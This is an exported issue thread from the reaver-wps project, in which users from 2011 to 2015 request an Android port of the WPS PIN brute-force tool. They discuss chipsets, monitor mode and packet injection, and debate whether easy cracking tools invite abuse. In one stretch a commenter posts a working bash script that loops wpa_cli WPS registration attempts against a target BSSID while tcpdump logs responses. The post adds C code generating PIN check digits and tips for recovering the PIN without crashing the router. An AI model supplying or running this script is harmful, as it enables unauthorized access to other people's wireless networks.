jason7750 / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

Needs to be ported to Android, pleaseee??? #38

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
What steps will reproduce the problem?

1. Open reaver-1.2.tar.gz on android file explorer.

What is the expected output? What do you see instead?

Hacking WPA/WPA2 everywhere!

What version of the product are you using? On what operating system?

reaver-1.2.tar.gz on Android 2.3.7

Please provide any additional information below.

Is breaking wpa/wpa2 everywhere on our android device will not be great?

Original issue reported on code.google.com by fals3...@gmail.com on 31 Dec 2011 at 1:49

GoogleCodeExporter commented 9 years ago
Can you get packet injection working on your android phone?
I guess that might/will be the biggest problem.

Unless you can inject packets I don't see it happening

Original comment by jcdento...@gmail.com on 31 Dec 2011 at 2:29

GoogleCodeExporter commented 9 years ago
Some time ago i made working monitor mode and packet injection on g1 ( wifi 
chipset wl1251 ) thx to n900 patches so at least on g1 / hero / magic ( all got 
wl1251 ) it should be possible. 
http://forum.xda-developers.com/showthread.php?t=1271854

Original comment by zewe...@gmail.com on 31 Dec 2011 at 4:53

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Supply me an android phone that will do monitor+inject and I will make it 
happen.

-peter

Original comment by peac...@tacnetsol.com on 1 Jan 2012 at 1:39

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
If an A855 Motorola Droid can do monitor+inject, I can produce a working 
handset.

Original comment by a...@findlaypc.com on 3 Jan 2012 at 12:48

GoogleCodeExporter commented 9 years ago
Most Motorola phones use TI chipsets which are not capable.

Original comment by peac...@tacnetsol.com on 3 Jan 2012 at 2:58

GoogleCodeExporter commented 9 years ago
If i provid a micro linux embedded device that run an OpenWrt distro may be is 
possible release a porting ?

Original comment by spyphone...@gmail.com on 4 Jan 2012 at 1:22

GoogleCodeExporter commented 9 years ago

Original comment by cheff...@tacnetsol.com on 11 Jan 2012 at 4:54

GoogleCodeExporter commented 9 years ago
Some devices support USB-OTG, which would enable a kernel module, like rtl8187, 
for use with a USB wireless adapter.  

Original comment by ryanjna...@gmail.com on 13 Jan 2012 at 7:04

GoogleCodeExporter commented 9 years ago
I think that this tool needs to stay on PC.Because today any kiddie with this 
tool and Android smartphone can then hack their neighbors network and do all 
kinds of trouble.And honestly we don't want increase of kid hackers.

Original comment by renny.to...@gmail.com on 5 Feb 2012 at 1:42

GoogleCodeExporter commented 9 years ago
not just that but this tool boots clients off their routers.. we don't need 
this in the hands of idiots =] or a windows version

what's wrong with a netbook like the eee? < 1 sec a pin on a cisco router.. I 
wish there was a paypal to donate- I'd send a few bucks.. some really good code 
here and he's integrating it into aircrack.. I see the site is selling a idiot 
box to do this but if you have 600 bucks to throw around- then you are probably 
proficient in other areas of life.. so have at it- I'm worried about the 12 
year old snufalufagus with his phone denying his neighbors wifi by pressing a 
button

it's like giving airpwn and a yagi to a moron and expecting him not to use it 
on starbucks

between this and pyrit, it's no wonder I run wired at home with a long pass to 
my ap.. even the brand new att routers are still vulnerable to the same attacks 
as the last set, 100% breakable with the default key using wpa2.. who's in 
charge of security over there, a cow maybe

Original comment by benbar...@gmail.com on 5 Feb 2012 at 4:38

GoogleCodeExporter commented 9 years ago
Considering that there is little consistency regarding android hardware this is 
not the most likely port to occur, if it does then no doubt people will have to 
buy the appropriate model (and revision) of phone (and a few sets of spare 
batteries)

I'm sensing childishness though regarding the seeming anger regarding script 
kiddies, do you really think that the script kiddies don't have laptops & 
netbooks? If you where particularly knowledgeable you wouldn't be shouting 
about keeping the tool PC only.

With Beagleboards, shivaplugs, Raspberry Pi and modded Pogoplugs there are a 
multitude of low power consumption devices with USB (to use a network adaptor 
of choice) to cause problems with (high powered antenna are not necessary with 
such a setup) so don't be getting so precious folks, calm down

BTW there is real Wifi kit out there (I work with it) that live in retail 
chains (and corporate land) strangely enough they do not use WPS, yes they have 
been checked since christmas (to make sure they don't respond anyway), they are 
much more interesting to play with than the average SoHo equipment

Original comment by kilby.ct...@gmail.com on 6 Feb 2012 at 12:34

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
laptops and netbooks with windows running vmware and bt? yeah that's exactly 
what they run.. but they've been limited to open and wep networks usually.. 
wpa2 solved with crunch piped to pyrit | cowpatty at 100k+/sec or dictionary 
attack without a pre generated rainbow table is still out of skill set of the 
snuffaluffagus.. they know nothing about these specific attacks or specialized 
attacks on different types of routers, nothing because it takes more than 
./configure make && make install..

reaver is so easy and automated, if it were to be ported to say ios for example 
(jailbroke)- not just android (and it worked even with specific mass produced 
phones), there would be jackass bowel movements all over the world.. I don't 
care if a responsible geek manages to do this.. just the code he has written 
here is almost too slick if you know what I'm sayin- he could have thrown in 
some monkey wrenches =p I'm just sayin.. felt the same way about armitage..

anyways it's just my opinion on the matter.. what's sad is I noticed business 
around here still running wep (even the bmw dealership's office runs wep here) 
and at&t up to last year was still installing their 2wire routers with wep as 
default

now they've switched to wpa2 but still have the same problem with the default 
passkey, 10 characters numeric- that's 30 hours in pyrit for all the keys.. if 
the wps pin attack didn't act like a dos on the router, I might not care- just 
in the wrong hands this is a double butt violater

Original comment by benbar...@gmail.com on 6 Feb 2012 at 9:14

GoogleCodeExporter commented 9 years ago
I have to admit that for me an android version of reaver would be useful as the 
people who hold the purse strings would get upset at a phone being used to 
break their network security. For some reason 'management' still think that 'IT 
professionals' are the only people on earth who have laptops (whatever an IT 
professional is)

Anyway this will now be heading off topic

The biggest script kiddies I have ever encountered are so called professional 
pen testers, they have their bought copy of Nessus on windows and a VM with 
Backtrack then they simply follow their course notes, usually without much 
understanding of the  'security issues' which they encounter.

However it has to be remembered that tomorrows talented 'security researchers' 
are todays beginners and very few beginners start with original methods.

Without reaver (or the other python script) would you be playing with WPS 
breaking ?
I can answer an honest NO (for myself), though 15-20 years ago the answer would 
have been Yes, as my life permitted me time to write interesting things.
If your answer is 'no' then please don't complain about idiots who have the 
same tools as you, it happens and they have as much right as you have.

I used to be really uptight about the undeserving cut & paste coders & 
crackers, I'm older now.

re: There's poor security all over though sometimes there are reasons (mostly 
arrogance, ignorance and cost) but sometimes its unavoidable legacy kit is 
common, but  the risk may be mitigated with careful firewalling, IDS and sanity 
checking

Be thankful the tool exists in a reliable version and encourage it's spread to 
other platforms, you may have need of it at some point

Original comment by kilby.ct...@gmail.com on 7 Feb 2012 at 10:28

GoogleCodeExporter commented 9 years ago
motorola backflip here, is the same shit that my laptop, (broadcom stuff), as 
far as i tried, just could enable monitor mode (buggy) and packets injection is 
impossible, im pretty sure it can be done on another phone using a different 
wlan chipset.

Original comment by frapeti@gmail.com on 25 Feb 2012 at 3:34

GoogleCodeExporter commented 9 years ago
Just wait for a recent kernel. Thanks to mac80211 nearly every recent driver in 
the vanilla kernel supports package injection and monitor mode. Android phones 
has just mostly very old kernel running.

Original comment by gentoo.l...@gmail.com on 26 Feb 2012 at 4:17

GoogleCodeExporter commented 9 years ago
If tcpdump, wpa_cli and bash are available for android, which a quick bit of 
recon tells me they are.

Then a workaround is more than likely possible. ;)

Original comment by ObiDanKi...@googlemail.com on 28 Feb 2012 at 12:30

GoogleCodeExporter commented 9 years ago
For those who are alright with their programming, heres some basic building 
blocks for a potential android wps tester. I'm just beginning programming, but 
with a bit of help i rustled this up...this is the latest code i have working 
thus far on a regular system that is....

Pre-requisites that would need to be working already on android are... 

Bash
Tcp-dump,
Wpa-cli/wpa_supplicant
Tee
Ean8 (seperate module...i will include code as a suffix)

Heres the code i have working at the mo....The lines may get messed up, so I've 
used me newly created #EL Tags to show where new lines are. Remove at own 
discretion.
Name this file wpstester, or whatever you like ;), set its permissions, jobs a 
good un. This is fairly system specific so you might need to tweak it here and 
there to get it working properly. 

#!/bin/bash #EL

        sudo tcpdump -i wlan0 -v -l 2> /dev/null | tee /home/$USER/log.txt & #EL

sleep 7 #EL

        for i in {0..1}; do  #EL
        code=$(printf "%04d"000 $i) #EL
        ans=$(ean8 $code) #EL
        echo "Time : $(date +%H:%M:%S)" >> /home/$USER/log1.txt #EL
        echo "BSSID : BSSID HERE" >> /home/$USER/log1.txt #EL
        echo "WPS PIN : $ans" #EL
        echo "WPS PIN : $ans" >> /home/$USER/log1.txt #EL
        wpa_cli wps_reg BSSID HERE $ans >> /dev/null #EL

sleep 15 #EL

done #EL

for i in {2..2000}; do #EL
        code=$(printf "%04d"000 $i) #EL
        ans=$(ean8 $code) #EL
        echo "Time : $(date +%H:%M:%S)" >> /home/$USER/log1.txt #EL
        echo "BSSID : BSSID HERE" >> /home/$USER/log1.txt #EL
        echo "WPS PIN : $ans" #EL
        echo "WPS PIN : $ans" >> /home/$USER/log1.txt #EL
        wpa_cli wps_reg BSSID HERE $ans >> /dev/null #EL

sleep 10 #EL

done #EL

sudo kill -9 2> /dev/null $(ps -A | grep tcpdump | awk '{print$1}') #EL

exit 0 #EL

And the Ean8 Module.....

#include <stdio.h> #include <stdlib.h> #include <string.h>

int main(int argc, char argv) {

    int i, odd_sum = 0, even_sum = 0, sum, check_digit; // to install 'make ean8' or 'gcc -o ean8 ean8.c' char base; // then move exe to /bin path. 

    if (argc != 2) {

        fprintf(stderr, "Error: Wrong number of arguments\n"); exit(EXIT_FAILURE); 

    } 

    base = argv1?; 

    if (strlen(base) != 7) {

        fprintf(stderr, "Error: Argument is not 7 characters\n"); exit(EXIT_FAILURE); 

    } 

    for (i = 0; i < 7; i += 2) {

        // Odd digits odd_sum += basei? - '0'; 

    } 

    for (i = 1; i < 7; i += 2) {

        // Even digits even_sum += basei? - '0'; 

    } 

    sum = odd_sum 3 + even_sum; check_digit = (10 - (sum % 10)) % 10; printf("%s%d\n", base, check_digit); 

    return(EXIT_SUCCESS); 

} 

Theres some other little tweaks you may have to do as well, to a couple of the 
other programs, I've posted what i did with those on the hints and tips part of 
this forum. 

Maybe this will help someone along the line come up with a workaround for 
android...who knows.....If a reaver port isn't forthcoming.

Only downside is this workaround is a bit slower than reaver, until i figure 
out how to implement small dh keys by tweaking the code in more than likely 
wpa_supplicant/wpa_cli.

Good luck dudes/dudettes ;)

Original comment by ObiDanKi...@googlemail.com on 6 Apr 2012 at 3:29

GoogleCodeExporter commented 9 years ago
P.s the third sleep command can be set as a variable to whatever you find the 
minimum try time is before you fry/crash the router you are testing. 

There is a trend i noticed whereby the first 1-2 tries take slightly longer 
than the average send time, and if you put a longer sleep time for the first 
1-2 attempts, then the following attempts can actually be sped up 
significantly. Granted this isn't as fast as reavers small dh-keys, but for a 
work-around i guess its o.k ;)

Original comment by ObiDanKi...@googlemail.com on 6 Apr 2012 at 3:36

GoogleCodeExporter commented 9 years ago
Sorry triple post....Then you just have to grep the log files for 'id 4'. (Off 
the top of my head, might be 'id 3' though =P) That result cross-correlates 
with the time in the other log-file and there you have the first 4 digits of 
the wps pin.

Original comment by ObiDanKi...@googlemail.com on 6 Apr 2012 at 3:40

GoogleCodeExporter commented 9 years ago
Haha sorry last thing. 

In the original post on the hints and tips part i mentioned using wireshark.

You can use this method if you want, but the newer post above, creates a 
semi-automatic solution, (i.e its better). By using the generically available 
tcpdump instead, and integrating it as a co-process in the source-code.

Perhaps someone else can then take this and fully-automate it, the next step 
was to integrate a sectional grepping procedure...i.e test 1..100 pins then 
stop grep...check for 'id 3 (or 4)'continue...

I suppose i can continue my quest though, its actually a fascinating project 
for learning a little programming =P.

Original comment by ObiDanKi...@googlemail.com on 6 Apr 2012 at 4:00

GoogleCodeExporter commented 9 years ago
Any progress with reaver working with android? 

Original comment by sheen...@googlemail.com on 15 May 2012 at 9:11

GoogleCodeExporter commented 9 years ago
Yes. Put backtrack 5 on android!

Original comment by ffej5...@gmail.com on 18 Jun 2012 at 3:53

GoogleCodeExporter commented 9 years ago
N900 and N950 has reaver.

Original comment by ifle...@gmail.com on 11 Aug 2012 at 9:40

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Monitor mod in android un possible. http://bcmon.blogspot.fi/. now only what we 
need is reaver :)

Original comment by pta...@gmail.com on 23 Sep 2012 at 1:56

GoogleCodeExporter commented 9 years ago
OMG, so much thanks for that link !!!!1 ;DDDD

Original comment by fals3...@gmail.com on 23 Sep 2012 at 3:12

GoogleCodeExporter commented 9 years ago
Anyway Reaver needs root, that's why it wouldn't be program for children :-) 

Original comment by NosovK on 29 Sep 2012 at 11:16

GoogleCodeExporter commented 9 years ago
Is there any way to boot it in Symbian OS?

Original comment by kostad...@yahoo.com on 29 Jan 2013 at 12:20

GoogleCodeExporter commented 9 years ago
Any updates? I'd love to get reaver on my phone.

Original comment by jellekoo...@gmail.com on 2 Mar 2013 at 11:18

GoogleCodeExporter commented 9 years ago
hey there android supports now rtl 8187 chipset in monitor mode via USB-OTG no 
root required
http://www.kismetwireless.net/android-pcap/

might be that injection would work too... so anyone out there ready to make 
reaver-android port??

Original comment by gustarba...@gmail.com on 4 Mar 2013 at 10:56

GoogleCodeExporter commented 9 years ago
HD2 with Android and Backtrack installed.
I have compiled and installed bcm4329 driver with monitor mode that works 
correctly with airomon and aireplay.
Also, I have compiled and installed Reaver, but there is support problem.
Reaver will not associate (timeout occur).
After aireplay fakeauth Reaver associate but start getting 
WARNING: Receive timeout occurred  

Recorder PCAP file with both Reaver association attempt and after areplay 
association:
https://www.dropbox.com/s/bjsq8q2hfuyv7tc/rr-02.cap

Original comment by petar.bojovic.paxy@gmail.com on 23 Jun 2013 at 8:34

GoogleCodeExporter commented 9 years ago
Just checked from other computer that monitored same AP activity. There is no 
any packet actually sent from HD2 via Reaver. 
Only when I used areplay packet was really sent.
rr-02.cap shows packet cap from same device as Reaver.

Driver Developer mentioned following:
"Radiotap - we don't handle radiotap on packet injection. 'aireplay-ng' works 
fine with it but tools like 'reaver' seem to require it."

Can you make a support for packet injection without Radiotap ? (Like on 
aireplay) 

Original comment by petar.bojovic.paxy@gmail.com on 23 Jun 2013 at 11:28

GoogleCodeExporter commented 9 years ago
People new update on monitor mode on Android:
http://bcmon.blogspot.de/2013/07/monitor-mode-reloaded_14.html

As far as i know that was one of the big problem to not having Reaver ported to 
Android.

#35
How did you compile and install Reaver on Android? I'm on a Nexus 7 with 
CyanogenMod 10.1.2. Thanks in advance.

Original comment by lord...@gmail.com on 23 Jul 2013 at 11:29

GoogleCodeExporter commented 9 years ago
Done.

http://forum.xda-developers.com/showthread.php?t=2456888

Original comment by davidw.s...@gmail.com on 24 Sep 2013 at 7:49

GoogleCodeExporter commented 9 years ago
BCMON.apk does not work correctly with HD2 (ICS myMIUI ROM).
ping_bcmon does not returns packets.

I have tested supplied reaver with older (2012) bcmon kernel module drivers, 
reaver starts fine but will not inject packets. Function pcap_inject is 
processed without exception but packet do not leave interface. 

Original comment by petar.bojovic.paxy@gmail.com on 26 Sep 2013 at 8:40

GoogleCodeExporter commented 9 years ago
I feel like no one read anything that was being written on this blog 
previously. Did no one notice that it's a good thing to not have tons of people 
have this on their iPhones? Keep it to yourself. Don't post android ROMs with 
reaver already installed online. Just do it by yourself. Do not jeopardize 
Internet security for temporary happiness. That's terrorism. I feel like there 
are only a few software engineers who would like to be terrorists.

Original comment by BflatMas...@gmail.com on 27 Oct 2013 at 12:10

GoogleCodeExporter commented 9 years ago
Ok calm down francis

Original comment by peeon...@gmail.com on 27 Oct 2013 at 12:26

GoogleCodeExporter commented 9 years ago
Jeopardizing Internet security?  Sheesh.

If Reaver works on it, it was already insecure long before it became easy...

Original comment by a...@findlaypc.com on 27 Oct 2013 at 3:43

GoogleCodeExporter commented 9 years ago
Hello every one , does any one can help to install reaver it gives me error 
pleaseeeeeeeeee:
./configure 
checking for gcc... gcc
checking whether the C compiler works... no
configure: error: in `/root/reaver-1.4/src':
configure: error: C compiler cannot create executables
See `config.log' for more details.

Original comment by tawakoli...@gmail.com on 30 Oct 2014 at 11:30

GoogleCodeExporter commented 9 years ago
i installed bcmon and reaver for android but when i opened RfA and test the 
monitor mode it showed me an error that monitor mode activation failed what to 
do now

Original comment by ajaybish...@gmail.com on 12 Feb 2015 at 4:40